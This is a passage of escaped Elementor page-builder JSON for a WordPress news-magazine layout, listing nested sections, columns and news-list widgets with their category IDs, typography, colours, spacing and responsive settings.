0\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr